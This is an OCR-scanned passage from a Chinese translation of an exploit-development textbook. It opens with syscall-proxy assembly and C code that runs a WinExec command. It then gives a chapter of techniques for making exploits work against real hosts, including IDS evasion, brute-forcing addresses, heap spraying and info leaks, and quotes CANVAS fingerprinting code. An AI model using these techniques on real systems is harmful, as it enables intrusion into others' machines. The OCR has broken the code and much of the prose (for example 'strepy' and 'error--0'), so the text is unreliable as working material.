jmp start; 


// increment ebx until it points to a '0' byte 
Skip string: 

mov al, byte ptr [ebx]; 

cmp al, 0; 

jz done string; 

inc ebx; 

jmp skip string; 


done string: 
inc ebx; 
ret; 


start: 
// so skip the dll name 
call skip string; 





// store function name 
mov dword ptr[ ebp + 4 ], ebx 


// skip the function name 
call skip string; 


// store parameter count 

mov ecx, dword ptr [ebx] 

mov edx, ecx 

mov dword ptr[ ebp + 8 ], ecx 


// store out param size 

add ebx,4 

mov ecx, dword ptr [ebx] 

mov dword ptr[ ebp + 12 ], ecx 


// store function flags 
add ebx,4 
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mov ecx, dword ptr [ebx] 
mov dword ptr[ ebp + 16 ], ecx 


add ebx,4 
// in this loop, edx holds the num parameters we have left to do. 


next param: 
cmp edx, 0 
je call_proc 


mov cl, byte ptr[ ebx j]; // cl = flags 
inc ebx; 

mov eax, dword ptr[ ebx J; // eax = size 
add ebx, 4; 


mov ch,cl; 
and cl, 1; // is it a pointer? 
jz not ptr; 


mov cl,ch; 


// is it an 'in' or 'inout' pointer? 
and cl, 2; 


jnz is in; 


// so it's an 'out' 

// get current data pointer 
mov ecx, dword ptr [ ebp + 32 ] 
push ecx 


// set our data pointer to end of data buffer 
add dword ptr [ ebp + 32 ], eax 
add ebx, eax 
dec edx 
jmp next, param 


is in: 
push ebx 


// arg is 'in' or 'inout' 

// this implies that the data is contained in the received packet 
add ebx, eax 
dec edx 
jmp next param 


not ptr: 
mov eax, dword ptr[ ebx J]; 
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push eax; 
add ebx, 4 
dec edx 
jmp next param; 

call. proc: 
// args are now Set up. let's call... 
mov eax, dword ptr! ebp ]; 
push eax; 
mov eax, dword ptr[ ebp + 24 ]; 
call eax; 
mov ebx, eax; 
mov eax, dword ptr[ ebp + 4 J; 
push eax; 
push ebx; 
mov eax, dword ptr[ ebp + 28 ]; 
call eax; // this is getprocaddress 
call eax; // this is our function call 
// now we tidy up 
add esp, 0x800; 
add esp, 0x100; 
pop ebp 

} 
return 1; 
} 





int main( int argc, char *argv[] ) 
{ 
unsigned char buff[ 256 J; 
unsigned char *psz; 
DWORD freq = 1234; 
DWORD dur = 1234; 
DWORD show = 0; 
HANDLE hk32; 
void *loadlib, *getproc; 
char *emd = "cmd /c dir > c:\\foo.txt"; 


psz = buff; 


strepy( psz, "kernel32.dll" ); 
psz += strlen( psz ) + i; 


strcpy( psz, "WinExec" ); 
psz += strlen( psz ) + 1; 


*((unsigned *)(psz)) = 2; // parameter count 
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psz += 4; 


*((unsigned *) (psz)) = strlen( cmd ) + 1; // parameter size 
psz += 4; 

// set fn_flags 

*((unsigned *)(psz)) = 0; 

psz += 4; 


psz += Marshall( IS IN, sizeof( DWORD ), (unsigned char *)&show, 
psz, sizeof( buff ) ); 

psz += Marshall( IS PTR | IS IN, strlen( cmd ) + 1, (unsigned char 
*)emd, psz, sizeof( buff ) ); 


hk32 = LoadLibrary( "kernel32.dll" ); 
loadlib - GetProcAddress( hk32, "LoadLibraryA" ); 
getproc - GetProcAddress( hk32, "GetProcAddress" ); 


AsmDemarshallAndCall( buff, loadlib, getproc ); 


return 0; 


} 

可 见 ， 这 个 例子 执行 了 解 编 组 Cdemarshalling) 任务 ， 并 调用 winExec 在 C 盘 的 根 目录 建 了 
一 个 文件 。 虽 然 这 个 过 程 并 不 难 ， 没 有 多 大 挑战 性 ， 但 这 个 例子 可 以 运行 ， 也 演示 了 解 编组 的 过 
程 。 这 个 机 制 的 核心 代码 略 大 于 128B， 即 使 添加 了 独立 完整 的 周边 补丁 和 套 接 字 代码 ， 对 整个 代 
理 程序 来 说 ， 仍 小 于 500B。 


22.9 小 结 


本 章 介 绍 了 怎样 通过 shellcode 做 一 个 运行 时 补丁 。 我 们 没有 创建 简单 的 反 向 连接 shellcode 
(IDS 能 轻松 地 发 现 它 )， 而 是 在 渗透 测试 时 运用 巧妙 的 运行 时 修补 来 掩护 攻击 行为 。 本 章 还 详细 
介绍 了 系统 调用 代理 的 概念 ， 因 为 在 将 来 ， 多 数 shellcode 可 能 都 会 用 系统 调用 代理 来 实现 。 





ELENE 








个 bug 都 有 一 段 活动 期 。bug 从 产生 到 运行 、 然 后 消失 的 整个 过 程 中 ， 可 能 从 来 都 没 被 

发 现 和 破解 。 对 黑客 来 说 ， 每 个 bug 都 是 创建 破解 的 好 机 会 ， 就 像 是 能 穿 墙 而 过 的 漏 

洞 魔 开 。 但 生成 可 以 在 实验 室 里 运行 的 魔 咒 是 一 回 事 ， 可 以 在 浩渺 无 边 的 互联 网 上 运行 的 却 是 另 
外 一 回 事 。 本 章 主要 介绍 怎样 编写 在 实际 环境 中 可 用 的 破解 代码 。 


23.4 不 可 靠 的 因素 


本 节 主 要 介绍 实际 破解 时 ， 可 能 无 法 可 靠 运 行 的 各 种 各 样 的 原因 。 记 住 ， 尽 管 破解 代码 不 正 
常 工作 的 原因 可 能 有 很 多 种 ， 有 时 让 人 无 从 下 手 ， 但 就 像 俗话 所 说 ,“ 睹 猫 总 能 碰 到 死 耗子 ”。 


23.1.1 魔术 数字 

有 些 漏洞 〈 如 第 17 章 讨论 的 RealServer 栈 溢出 ) 可 以 很 可 靠 地 被 破解 。 而 另外 一 些 漏洞 〈 如 
etlogin 堆 二 次 释放 漏洞 ) 就 很 难 可 靠 地 利用 。 然 而 ， 你 在 动手 之 前 是 不 可 能 预知 某 个 漏洞 的 破 
解 有 多 可 靠 的 。 另 外 ， 破 解 越 来 越 难 的 漏洞 是 学 习 新 技术 的 唯一 方法 ， 只 阅读 相关 的 资料 并 不 能 
真正 掌握 技术 的 精髓 。 因 此 你 应 该 尽 十 二 分 努力 使 破解 尽 可 能 地 可 靠 。 在 某 些 情况 下 ， 在 实验 室 
里 100% 可 以 工作 的 破解 , 但 在 互联 网 上 可 能 只 有 50% 的 时 间 可 以 工作 。 为 了 提高 它 在 真实 环境 下 
的 可 靠 性 ， 可 能 一 切 都 要 重头 再 来 。 

当 第 一 次 为 漏洞 编写 破解 代码 时 ， 这 个 破解 代码 可 能 只 能 在 你 的 机 器 上 工作 。 这 很 可 能 是 因 
为 你 把 破解 代码 里 的 一 些 重要 数据 硬 编码 了 ， 比 如 说 返回 地 址 或 geteip 地 址 。 当 你 能 改写 函数 
指针 或 保存 的 返回 地 址 时 , 你 需要 把 执行 流 重 定向 到 某 个 位 置 一 一 这 个 位 置 很 可 能 取决 于 多 种 因 
素 ， 而 你 只 能 控制 其 中 的 一 些 。 我 们 把 这 种 情形 称 为 单 因素 破解 〈one-factor exploit). 

同样 ， 你 的 破解 代码 里 可 能 有 一 个 地 方 ,在 那里 有 一 个 指向 字符 串 的 指针 。 目 标 程 序 在 你 得 
到 执行 控制 前 使 用 这 个 指针 。 为 了 有 效 地 获取 控制 ， 你 可 能 需要 把 指针 “攻击 字符 串 的 一 部 分 》 
设 为 指向 内 存 中 无 害 的 位 置 。 这 个 步骤 又 为 破解 增加 了 额外 的 因素 ， 为 了 成 功 地 破解 目标 系统 ， 
必须 了 解 这 些 因 素 。 

许多 容易 的 破解 代码 是 单 因素 破解 或 双 因 素 破 解 。 例如 , 基本 的 远程 栈 溢 出 通常 是 单 因 素 破 
解 ， 你 只 需 猜 测 shellcode 在 内 存 中 的 地 址 。 但 是 当 遇 到 堆 溢 出 时 〈 这 是 典型 的 双 因素 破解 )， 你 
还 必须 着 手 寻找 有 助 于 减少 系统 混乱 程度 的 方法 。 
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23.1.2 版 本 

当 利 用 代码 在 网 上 四 处 活动 时 , 将 面临 一 个 严峻 的 问题 , 你 几乎 不 可 能 知道 别人 的 机 器 上 到 
底 加 载 了 什么 东西 。 它 或 许 是 Windows 2000 Advanced Server, 恰好 和 你 实验 室 里 的 某 台 机 器 类 似 ; 
或 许 它 正在 运行 ColdFusion， 导 致 频繁 的 内 存 交 换 操 作 ， 或 许 它 加 载 的 是 Simplified Chinese 
Windows 2000; 它们 可 能 在 SP 的 基础 上 打 了 所 有 的 补丁 , 一 些 补丁 可 能 是 手动 安装 的 ， 甚 至 可 能 
有 的 补丁 都 装 错 了 ; 远程 系统 可 能 是 跑 在 Alpha 上 的 Linux， 或 者 是 一 个 多 处 理 器 系统 。 所 有 这 些 
因素 都 可 能 会 影响 你 的 破解 。 举 一 个 例子 ， 许 多 公开 的 Microsoft RPC Locator 破解 在 多 处 理 器 系 
统 上 不 能 正常 工作 ,有 的 在 Xeon 处 理 器 系统 上 也 会 失败 , 因为 Windows 把 Xeon 处 理 器 当 作 双 处 理 
器 系统 。 所 有 这 些 问 题 很 难 从 远程 跟踪 。 

另外 ， 当 运行 堆 恶 化 破解 代码 时 ， 在 破坏 堆 的 过 程 中 很 难 阻止 其 他 人 使 用 它 。 另 外 ， 与 堆 溢 
出 有 关 的 常见 问题 是 ， 他 们 改写 依赖 具体 libc 版 本 的 函数 指针 。 因 为 每 个 Linux 的 libc 版 本 都 稍微 
有 些 不 同 ， 破 解 代 码 必须 针对 特定 发 行 版 的 Linux。 不 幸 的 是 ， 现 在 还 没有 哪个 Linux 发 行 版 占据 
了 大 部 分 的 市 场 份额 ， 因 此 ， 把 Linux 上 的 这 些 值 硬 编码 到 破解 里 不 像 在 Windows 或 者 商业 UNIX 
系统 上 那么 容易 。 

记 住 ， 许 多 UNIX 三 商 在 同一 版 本 号 下 会 发 行 多 个 不 同 的 版 本 。 比 如 说 ， 购 买 时 间 不 同 ， 你 
的 Solaris 8 CD 和 其 他 人 的 Solaris 8 CD 可 能 就 不 一 样 。 你 的 版 本 可 能 已 经 打 过 补丁 而 其 他 人 的 没 
有 ， 或 者 其 他 人 的 打 过 补丁 而 你 的 没有 。 


23.1.3 shellcode 问题 


有 些 程序 员 会 花费 数 星 期 的 时 间 编 写 属于 自己 的 shellcode， 而 有 些 人 可 能 会 直接 用 
Packetstorm (http://packetstormsecurity.org/) 上 现成 的 shellcode。 然 而 ， 不 论 你 的 shellcode 多 么 成 
熟 ， 它 仍 是 一 个 用 汇编 语言 编写 的 、 在 不 稳定 环境 里 运行 的 程序 。 这 意味 着 shellcode 本 身 可 能 就 
是 一 个 故障 点 。 

在 实验 室 里 ， 你 和 目标 系统 在 同一 个 集线器 上 ， 然 而 ,在 网 上 ,你 的 目标 系统 可 能 在 地 球 的 
另 一 个 角落 , 而 在 那些 角落 里 的 用 户 正 按 自己 的 喜好 设置 网 络 。 这 意味 着 他 们 可 能 把 网 络 的 MTU 
设 为 512、 阻 塞 ICMP、 从 Linux 防 火 墙 上 把 [IS 端 口 转发 到 Windows 系 统 ， 或 者 在 防火 墙 上 过 滤 外 
出 传输 ， 等 等 。 

我 们 把 与 shellcode 相 关 的 问题 分 成 以 下 几 类 。 

1. 网 络 相关 的 

当 你 运行 shellcode 时 ，MTU (Maximum Transmission Unit) 或 路 由 选择 可 能 是 个 问题 ， 你 攻 
击 的 某 个 下 可 能 会 从 不 同 的 IP 或 网 络 接口 回 叫 (call back) 你 。 在 防火 墙 上 过 滤 外 出 传输 也 是 很 
常见 的 问题 ， 如 果 因 为 过 滤 的 原因 ，shellcode 不 能 回 叫 你 ， 应 该 干净 (隐蔽 ) 地 结束 执行 。 你 可 
能 想 使 用 UDP 或 TCMP 回 连 shellcode。 

2. 权限 相关 的 

在 Windows 里 ， 正 在 运行 的 线程 可 能 没有 加载 ws2_32.dalLI 的 权限 。 最 常见 的 解决 办 法 是 窃 
用 你 参与 的 、 假 设 ws2_32 .dal1 已 经 被 加 载 或 调用 RevertToself () 的 线程 。 在 某 些 版 本 的 Linux 
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上 《SELinux 等 )， 你 可 能 会 碰 到 类 似 的 权限 问题 。 

在 个 别 情形 下 ， 可 能 不 允许 你 创建 套 接 字 连接 或 打开 监听 端口 。 在 这 样 的 情形 下 ， 你 可 能 想 
修改 程序 的 原始 执行 流 〈 例 如 ， 为 了 允许 你 自己 进一步 操纵 它 ， 禁 止 目标 进程 正常 的 认证 ， 修 改 
它 要 读 取 的 文件 ， 添 加 用 户 ， 等 等 )， 或 者 为 你 的 shellcode 找 一 些 方法 ， 使 它 在 没有 外 部 联系 的 
情况 下 调节 它 的 访问 。 

3. 配置 相关 的 

错误 的 OS 识别 可 能 导致 你 把 错误 的 shellcode 或 返回 地 址 放 到 破解 代码 里 .很 难 从 远程 确定 目 
标 系 统 是 Alpha Linux 还 是 SPARC Linux， 明 智 的 做 法 是 两 者 都 试 一 下 。 

如 果 你 的 目标 进程 执行 了 chrooted 函 数 ， 可 能 没有 /bin/sh。 这 是 另 一 个 不 使 用 标准 
exeve (/bin/sh) shellcode 的 好 理由 。 

有 时 候 ， 栈 基 址 会 根据 你 攻击 的 进程 而 有 所 改变 ， 同 样 ,， 不 是 所 有 的 指令 在 每 种 类 型 的 处 理 
器 上 都 有 效 。 例 如 ， 或 许 你 的 目标 是 老 掉 牙 的 Aljpha 芯 片 ， 而 你 是 在 新 芯片 上 测试 的 ， 或 许 目标 
系统 是 一 个 有 着 大 指令 缓存 的 SGI 机 器 ， 而 这 些 缓存 在 攻击 期 间 没 有 被 刷新 。 

4. 主机 IDS 相 关 的 


chroot, LIDS, SELinux. BSD jail0、gresecurity、Papillion 和 同类 型 的 技术 可 能 会 从 多 个 方 


面 对 你 的 shellcode 产 生 影响 。 这 些 技术 日 益 流 行 ， 因 此 shellcode 要 有 相应 的 对 策 。 要 想 知道 它们 
是 否 会 影响 你 的 shellcode， 唯 一 的 方法 是 安装 它们 并 进行 严格 的 测试 。 

Okena 与 Entercept 的 实现 方法 是 多 住 《hook) 系统 调用 ， 并 基于 应 用 程序 通常 调用 哪些 系统 
调用 做 出 相应 的 整形 〈profiling)。 挫 败 这 种 整形 的 两 个 方法 是 ， 模 仿 应 用 程序 的 正常 行为 并 设法 
在 里 面 稍微 停留 一 会 儿 ， 或 者 设法 朱 败 系统 调用 挂钩 本 身 。 如 果 你 有 一 个 内 核 级 的 破解 ， 那 么 现 
在 就 是 你 直接 从 shellcode 里 使 用 它 的 机 会 了 。 

5. 线程 相关 的 

在 堆 溢 出 时 ， 系 统 为 了 处 理 响应 可 能 会 激活 另外 的 线程 ， 而 这 些 线程 可 能 会 调用 free() 或 
malloc()， 当 他 们 发 现 堆 被 破坏 后 ， 可 能 会 终止 当前 的 进程 。 其 他 的 线程 可 能 正在 监视 你 的 线 
程 是否 及 时 完成 。 因 为 你 已 经 接管 了 你 的 线程 ， 它 可 能 会 为 了 恢复 过 程 而 消灭 你 。 可 能 的 话 ， 从 
shellcode 里 检查 重要 线程 并 设法 模拟 它们 。 

你 的 破解 可 能 仅 依靠 一 个 线程 的 唯一 有 效 返 回 地 址 ， 这 通常 是 由 于 你 没有 进行 全 面 的 测试 
所 致 。 


23.2 对策 


很 多 因素 都 可 能 会 对 你 的 破解 代码 产生 影响 ， 使 它们 工作 不 稳定 或 完全 不 能 工作 ， 然 而 ， 也 
有 很 多 方法 可 以 帮助 你 解决 这 些 问 题 。 必 须 记 住 ， 你 正在 写 的 破解 代码 本 来 不 应 该 存在 。 破 解 的 
存在 只 是 因为 其 他 软件 里 的 bug。 因 此 ， 创 建 可 靠 的 破解 不 是 简单 地 运用 软件 工程 知识 就 能 实现 
的 。 你 应 当 一 直 监 视 进 程 , 经 常 尝试 找 出 解决 突然 出 现 的 问题 的 方法 。 当 拿 不 定 主意 时 , 想 一 想 : 
“John McDonald 会 怎么 做 ? ”下 面 这 段 对 话 摘自 Phrack 杂 志 第 60 期 《2002 年 12 月 )， 其 中 大 概 介 
绍 了 John McDonald 的 处 事 原则 ， 无 论 你 碰 到 什么 麻烦 ， 痢 要 记 住 他 的 话 。 
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Phrack: 你 发 现 了 非常 多 的 bug， 并 为 它们 编写 了 破解 代码 。 当 时 一 些 与 漏洞 破解 
有 关 的 创新 性 的 概念 还 没有 出 现 . 是 什么 驱动 你 挑战 复杂 的 错误 ?你 在 破解 时 一 般 采 用 
什么 方法 ? 
John McDonald: 随 着 时 间 的 推移 ， 我 寻找 漏洞 的 动机 也 在 变化 。 我 可 以 罗列 一 些 
理由 ， 它 们 在 不 同 的 阶段 驱使 我 前 进 。 这 些 动 机 中 既 有 自私 的 成 分 也 有 无 私 的 成 分 ， 但 
是 ,我 认为 所 有 这 些 都 可 以 归结 为 一 种 难以 抗拒 的 欲望 。 至 于 方法 ， 我 尽量 将 我 的 方法 
系统 化 。 我 会 计划 用 一 段 时 间 通 读 程序 ， 设 法 从 整体 上 了 解 它 的 体系 结构 及 思想 倾向 ， 
以 及 作者 本 身 的 技术 水 平 。 这 似乎 在 潜意识 里 对 我 有 所 帮助 。 
我 喜欢 从 程序 或 系统 的 低层 开始 , 逐步 向 上 , 过 滤 一 些 无 用 的 信息 来 寻找 潜在 的 和 
意外 的 行为 。 我 为 每 个 函数 做 注释 ， 并 用 函数 仔细 分 析 看 到 的 潜在 问题 。 在 注释 的 过 程 
中 ， 我 偶尔 也 会 休息 一 下 ， 或 做 一 些 有 趣 的 工作 ， 如 回溯 某 些 推论 ， 看 它们 是 否 正确 。 
在 编写 破解 前 ， 我 通常 设法 减少 或 者 消除 那些 需要 猜测 的 事情 。 
当 破 解 快 完成 、 但 似乎 没有 进步 时 ， 换 一 种 思路 ， 用 Halvar 风 格 写 破解 代码 : 用 IDA Pro 仔 细 
检查 发 生 问 题 的 地 方 以 及 程序 中 对 应 的 处 理 流程 。 反复 用 超 长 的 字符 串 测试 它 。 当 它 没 有 因 你 的 破 
解 而 骨 溃 时 ， 检 查 程 序 做 了 些 什 么 。 或 许 你 能 发 现 其 他 的 更 可 靠 的 错误 。 
除了 你 熟悉 的 平台 外 , 学 习 其 他 平台 上 的 破解 技术 也 非常 有 用 。 破 解 Windows 的 技术 在 UNIX 
上 可 以 派 上 用 场 ， 反 之 亦 然 。 即 使 派 不 上 有 用场， 它们 也 能 为 你 最 终 成 功 地 破解 提供 必要 的 灵感 。 


23.2.1 准备 

时 刻 准 备 着 。 事 实 上 ， 我 们 可 以 准备 一 堆 硬 盘 ， 然 后 按 OS 的 语言 类 型 、SP 和 可 用 的 补丁 分 
门 别 类 , 在 每 个 分 区 上 装 一 种 系统 。 之 后 利用 他 们 测试 哪 组 交叉 引用 地 址 可 以 在 所 有 的 系统 上 工 
作 。 其 实 ， 也 不 需要 一 堆 硬 盘 ， 有 VMWare 就 可 以 了 ， 尽 管 VMWare 与 OllyDbg 不 能 和 睦 相 处 ， 有 
时 会 产生 一 点 小 摩擦 。 根 据 不 同 的 目标 系统 建立 所 有 可 能 的 交叉 引用 地 址 数据 库 ， 有 助 于 我 们 减 
少 暴力 破解 的 时 间 。 
23.2.2 ”暴力 破解 

有 时 候 ， 生 成 健壮 的 破解 代码 的 最 好 方法 是 穷 举 可 能 的 魔术 数字 。 如 果 你 有 一 个 巨大 的 潜在 
的 return to ebx 地 址 的 列表 ， 或 许 只 需 般 历 它们 就 可 以 了 。 不 管 怎样 ， 暴 力 破解 应 该 是 最 后 才 
采用 的 手段 ， 不 过 ， 它 却 相当 有 效 。 

然而 ， 有 一 些 技巧 可 以 帮助 你 节省 时 间 ， 避 免 生成 过 多 的 日 志 。 当 你 正在 暴力 破解 时 ， 确 定 
你 是 否 可 以 同时 检查 多 个 地 址 。 缓存 有 效 的 结果 ， 以 便 你 能 首先 检查 他 们 。 网 络 上 的 主机 倾向 于 
用 同样 的 设置 ， 因 此 ， 如 果 你 的 方法 第 一 次 成 功 了 ， 那 么 它 很 可 能 会 再 次 成 功 。 

发 送 巨大 的 shellcode 缓 冲 区 有 时 候 也 会 使 你 正确 地 命中 魔术 数字 。 如 果 有 可 能 ， 尽 量 保 存 与 
魔术 数字 相关 的 信息 。 需 要 的 地 址 总 是 在 另 一 个 地 址 附近 要 比 它 们 彼此 完全 独立 好 多 了 。 

内 存 泄 露 会 使 暴力 破解 更 容易 。 有 时 候 为 了 用 shellcode 填 满 内 存 ， 甚 至 都 不 需要 真正 的 内 存 
泄露 。 例 如 ， 在 CANVAS 的 IIS ColdFusion 破 解 代 码 里 ， 我 们 和 远程 主机 建立 1 000 个 连接 ， 每 个 
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连接 发 送 20 000 个 shellcode 字 节 和 NOP。 这 个 过 程 用 shellcode 的 副本 快速 填 满 内 存 。 最 后 ， 我 们 
不 用 断 开 其 他 的 套 接 字 ， 直 接 发 送 堆 溢出 破解 就 行 了 。 虽 然 它 也 要 猜测 shellcode 的 位 置 ， 但 它 几 
乎 总 是 能 猜 对 ， 因 为 在 那 时 大 多 数 进程 的 内 存 空间 里 都 被 shellcode 填 满 了 。 

当 进 程 是 多 线程 〈 如 IIS) 时 ， 很 容易 填 满 进程 的 内 存 空间 。 即 使 这 个 进程 不 是 多 线程 ， 内 
存 泄露 几乎 也 能 实现 同样 的 目的 。 如 果 你 没有 发 现 内 存 泄露 ， 可 能 会 发 现 总 有 一 个 静态 变量 保存 
着 你 最 后 查询 的 结果 并 总 是 位 于 同一 位 置 。 如 果 你 查看 整个 程序 来 看 它 是否 有 任何 你 能 利用 完成 
这 种 目的 的 操作 ， 你 几乎 总 是 能 找到 一 些 有 用 的 东西 。 
23.2.3 ”本 地 破解 

不 可 靠 的 本 地 破解 不 应 该 存在 。 当 你 把 自己 映射 到 进程 空间 时 ， 你 几乎 可 以 控制 每 一 个 东 
西 一 一 内 存 空间 、 信 令 (signaling)、 什 么 在 磁盘 上 、 当 前 目录 的 位 置 。 许 多 人 用 本 地 破解 产生 
的 问题 自己 都 无 法 处 理 。 如 果 某 人 的 本 地 破解 每 次 都 不 能 正常 工作 ， 那 他 一 定 是 个 菜鸟 。 
O A, 当 写 一 个 简单 的 LinuxUNIX 本 地 缓冲 区 溢出 破解 时 ,用 exeve () 为 你 的 目标 进程 指定 
精确 的 环境 。 现 在 ， 你 可 以 准确 计算 出 你 的 shellcode 在 内 存 中 的 位 置 ， 不 需要 推测 ， 你 就 能 编写 
出 像 return-into-libc 攻 击 那 样 的 破解 代码 。 就 我 个 人 而 言 ， 我 更 喜欢 返回 strcpy() ， 把 shellcode 
复制 到 堆 里 ， 然 后 在 那里 执行 它 。 在 破解 期 间 ， 我 们 可 以 用 dlopen() 和 alsym() 查找 strcpy () 
的 地 址 。 这 个 技巧 可 以 使 你 的 破解 代码 在 实际 环境 中 运行 。 

正如 本 书 第 1 版 的 合 著者 Sinan Eren〈 他 广为人知 的 昵称 是 noir) 所 说 的 ， 在 攻击 内 核 时 ， 你 
可 以 把 内 存 映 射 到 任何 需要 的 地 址 ， 尽 可 能 使 它 把 返回 地 址 设 为 Shellceode 开 始 的 精确 位 置 ， 即 使 
你 只 能 用 一 个 用 于 返回 的 字符 。( 换 名 话说 ， 当 你 写本 地 内 核 破解 代码 时 ，0x00000000 可 能 是 完 
美的 有 效 返 回 地 址 。》 


23.24 ”OS/ 应 用 程序 指纹 


出 于 多 种 原因 ，Nmap 或 Xprobe 这 类 工具 提供 的 指纹 只 是 整体 的 一 部 分 。 当 破解 程序 时 ， 你 
不 仅 需要 知道 目标 操作 系统 的 信息 。 同 时 也 需要 知道 下 面 这 些 内 容 : 

口 体系 结构 (x86 / SPARC / 其 他 体系 结构 ) 

O 程序 的 版 本 号 

a 程序 的 配置 

口 OS 配置 (non-exec 栈 / PaX / DEP“) 

在 很 多 情况 下 ， 识 别 OS 的 用 处 并 不 大 ， 因 为 你 可 能 位 于 一 连 串 的 代理 后 面 。 也 许 是 因为 你 
尽 倍 网络 上 的 IDS， 不 敢 发 送 畏 形 的 OS 识 别 包 。 因 此 ， 为 了 编写 可 靠 的 破解 代码 ， 你 必须 独 辟 蹊 
径 ， 在 完全 正常 的 数据 传输 过 程 中 获取 远程 主机 的 指纹 。 

如 果 能 针对 最 终 将 被 攻击 的 端口 做 指纹 识别 ， 效 果 将 非常 好 。 下 面 的 例子 是 CANVAS 的 
MSRPC 破 解 代码 使 用 的 。 只 通过 端口 135〔( 目 标 服务 )， 我们 就 能 比较 好 地 缩小 OS 的 范围 。 首 先 ， 
把 XP 和 Windows 2003 与 NT 4.0 和 Windows 2000 区 分 开 。 然 后 把 Windows 2003 与 XP 区 分 开 ( 这 里 
没有 显示 另外 使 用 的 函数 )。 最 后 把 Windows 2000 与 NT4.0 区 分 开 。 整 个 函数 使 用 端口 135 (TCP) 
上 公开 的 接口 ， 它 一 般 运行 良好 ， 因 为 它 很 可 能 是 系统 上 唯一 开放 的 端口 。 利 用 这 个 技术 ,我们 
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的 破解 代码 只 用 几 个 简单 的 连接 ， 就 能 锁定 正确 的 目标 平台 。 
def runTest (self): 
UUID2K3="1d55b526-c137-46c5~ab79-638f2a68e869" 
callid=1 
error, s=msrpcbind (UUID2K3,1,0,self.host,self.port,callid) 
if error==0: . 
errstr-"Could not bind to the msrpc service for 2K3,XP - assuming 
NT 4 or Win2K" 
self.log(errstr) 
else: 
if self.testFor2003(): #Simple test not shown here, 
self.setVersion(15) 
self.log("Test indicated connection succeeded to msrpc service.") 
self.log("Attacking using version $d: 
%$s"%(self.version,self.versions[self.version] [01)) 
return 1 


self.setVersion(1) #default to Win2K or XP 
UUID2K-"000001a0-0000-0000-c000-000000000046" 
#only provided by 2K and above 
callid-1 
error,s-msrpcbind(UUID2K,0,0,self.host,self.port,callid) 
if error--0: 
errstr-"Could not bind to the msrpc service for 2K and above - 
assuming NT 4" 
self.log(errstr) 
self.setVersion(14) #NT4 
else: 
self.log("Test indicated connection succeeded to msrpc service.") 
self.log("Attacking using version £d: 
%s"%(self.version, self.versions[self.version] [0])) 
return 1 #Windows 2000 or XP 


callid=0 
#IRemoteDispatch UUID 
UUID-"A4d9f4ab8-7dic-11cf-861e-0020af6e7c57" 
error,s-msrpcbind(UUID,0,0,self.host,self.port,callid) 
*error is reversed, sorry. 
if error--0: 
errstr="Could not bind to the msrpc service necessary to run the attack" 
self.logí(errstr) 
return 0 
#we assume it's vulnerable if we can bind to it 
self.log("Test indicated connection succeeded to msrpc service.") 
self.log("Attacking using version %d: 
%s"%(self.version, self.versions[self.version] [0])) 


return 1 


23.2.5 ”信息 泄露 . 

在 过 去 ， 每 个 破解 就 是 一 枚 “ 射 后 不 管 ”(fire-and-forget) ?的 导弹 。 目 前 ， 优 秀 的 破解 代码 
作者 直接 在 目标 里 寻找 线索 来 指导 他 的 攻击 。 有 一 些 方 法 可 以 从 你 的 目标 获取 信息 (通常 是 指明 
确 的 内 存 地 址 )， 如 下 所 示 。 

口 读 取 并 解析 目标 发 给 你 的 数据 。 例 如 ，MSRPC 的 数据 包 经 常 包含 一 些 直接 从 内 存 中 编组 

(marshalled) 的 指针 ， 你 可 以 根据 这 些 指 针 推 测 目标 进程 的 内 存 空间 。 

a 在 堆 溢 出 返回 之 前 利用 它 写 入 你 的 数据 就 可 以 得 知 缓冲 区 在 内 存 中 的 位 置 。 

O 在 frontlink() 类 型 的 堆 洲 出 返回 前 ， 利 用 它 把 malloc 内 部 变量 的 地 址 写 入 你 的 数据 ， 

通过 简单 的 计算 ， 可 以 获悉 malioc 的 函数 指针 在 内 存 中 的 位 置 。 

改写 长 度 字段 通常 会 使 服务 器 返回 大 块 的 内 存 给 你 。( 如 BIND TSIG 溢出 。) 

a 利用 下 溢出 〈underflow) 或 类 似 的 攻击 使 服务 器 返回 部 分 内 存 给 你 。Phenoelit 的 FX 在 他 

的 Cisco HTTPD 破 解 代码 中 成 功 地 使 用 了 这 个 用 echo 包 的 方法 ; 这 是 把 两 个 破解 组 合 起 来 
产生 一 个 非常 可 靠 的 破解 的 范例 。 

为 了 了 解 你 的 破解 碰 到 何 种 错误 , 查看 定时 (timing) 信息 是 很 有 用 的 。 它 是 立刻 向 你 发 reset 
包 ， 还 是 等 超时 后 再 向 你 发 送 reset 包 ? 

Halvar Flake 曾 说 过 :“ 优 秀 的 黑客 不 会 只 寻找 一 个 错误 。” 信 息 泄露 可 以 使 很 难 的 错误 的 破解 
成 为 可 能 。 充 分 利用 好 信息 泄露 ， 甚 至 连 Pax( 基 于 内 核 的 高 级 内 存 保 护 补 丁 〉 也 可 以 轻松 拿 下 。 


23.3 小结 


假设 你 正在 为 一 个 定制 的 Win32 Web 服 务 器 编写 破解 代码 ， 忙 碌 一 整 天 后 ， 这 个 破解 栈 溢出 
的 代码 只 能 很 好 地 工作 五 六 次 。 它 使 用 标准 的 “改写 异常 处 理 器 结构 ”技术 ， 直 指 进程 的 内 存 空 
间 。 依 次 指向 .text 段 里 的 pop pop return。 然 而 ， 因 为 目标 进程 是 多 线程 的 ， 其 他 的 线程 偶 
尔 会 改写 这 个 shellcode， 从 而 导致 攻击 失败 。 因 此 ， 你 用 更 小 的 字符 串 重 写 破解 代码 ， 使 原始 的 
函数 安全 返回 ， 经 由 栈 帧 里 一 些 到 远 处 的 返回 ， 保 存 的 返回 指针 最 终 获 得 控制 权 。 尽 管 这 个 技术 
限制 了 你 所 能 使 用 的 shellcode 的 大 小 ， 但 却 使 shellcode 更 加 可 靠 。 . 

有 时 候 你 不 能 依赖 非常 稳定 的 技术 , 你 应 当 不 时 地 测试 一 些 不 同 的 破解 错误 的 方法 , 然后 尽 
可 能 在 多 个 测试 平台 上 尝试 每 个 方法 ， 直 到 发 现 最 佳 的 解决 方法 。 当 陷入 僵局 时 ， 试 着 把 攻击 字 
符 串 变 得 特别 长 或 尽 可 能 短 ， 或 者 注入 可 能 导致 某 种 异常 的 字符 。 如 果 你 有 源码 ， 值 得 下 些 功夫 
来 跟随 你 的 数据 ， 看 它 怎样 在 程序 中 流动 。 要 全 面 ， 不 要 放弃 。 在 这 样 的 游戏 里 ， 你 必须 有 足够 
的 自信 才能 笑 到 最 后 ， 因 为 在 很 多 时 候 ， 只 有 到 了 最 后 一 刻 ， 你 才 会 知道 结果 。 

我 们 向 你 保证 ， 你 的 坚持 是 值得 的 。 但 在 事实 面前 ， 也 要 学 会 妥协 ， 因 为 有 时 候 ， 你 根本 不 
